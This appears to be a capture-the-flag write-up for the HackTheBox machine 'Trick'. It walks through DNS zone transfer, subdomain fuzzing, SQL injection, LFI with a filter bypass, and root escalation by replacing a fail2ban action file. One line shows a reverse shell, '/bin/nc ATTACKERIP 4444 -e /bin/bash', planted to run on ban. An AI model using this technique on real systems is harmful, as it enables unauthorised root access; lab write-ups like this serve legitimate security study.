Trick

Personal Rating: Medium

Enumeration

A more extensive nmap scan reveals interesting insights:

sudo nmap -A -p- -v <IP>

Discovered open port 80/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166

53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian

Host script results:
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
|_dns-brute: Can't guess domain of "10.10.11.166"; use dns-brute.domain script argument.

So a DNS Server is running on the box!

DNS AXFR Zone Transfer

I found a webserver on port 80, but was stuck there right at the beginning. After checking out the forum I found out that you had to guess the domain trick.htb. I added it to my hosts file and the IP to my resolv.conf as DNS server. Then I could perform an axfr zone transfer over the domain trick.htb with the box as DNS Server:

root.trick.htb seemed the same as 10.10.11.166:80, but preprod-payroll.trick.htb shew a php login page.

Fuzzing the pages I found, some php files were revealed. Most of them were not of interest though.

At users.php I found a supposed Administrator with the username Enemigosss

I started an ssh bruteforce on that user with hydra, but to no avail:

I once again had to consult the forum and found out that you should find a third subdomain by guessing. I fuzzed for preprod-FUZZ.trick.htb and found preprod-marketing.trick.htb.

The smtp port was a rabbithole by the way. I could enumerate users by accessing the port with telnet 25, but nothing special was possible. Another way would have been hydra:

Manual SQLi

At http://preprod-marketing.trick.htb/login.php I performed some LFI testing and fuzzing, but didn't really find anything. The login page was susceptible to an SQLi though. After some testing I found a working payload to be this:

LFI w/ Filter Bypass

On the authenticated page an LFI was possible:

As seen, a simple WAF evasion was necessary. But then I could also get the ssh key of the user michael, using the LFI vulnerability.

Fail2ban SUID Exploit

sudo -l reveals something:

The command id also shew that the user was member of the security group. I searched for files with permissions of that group and found the folder /etc/fail2ban/action.d with root:security permissions.

The given permissions allow for removing the iptables-multiport.conf and replacing it with a custom one that executes /bin/nc ATTACKERIP 4444 -e /bin/bash upon banning someone. The config file is reset by a cronjob all two minutes, and I have to send many requests in a short period of time to get banned, so I automated both with a bash script on the target and hydra on my machine:

Finding the according config file and finding out, what it does under which conditions was hard for me. I must say I really disliked the fact that you had to guess domains here. But during a real external pentest this might be required and more obvious, so I should expect it the next time.

PreviousSquashedNextPoison

Last updated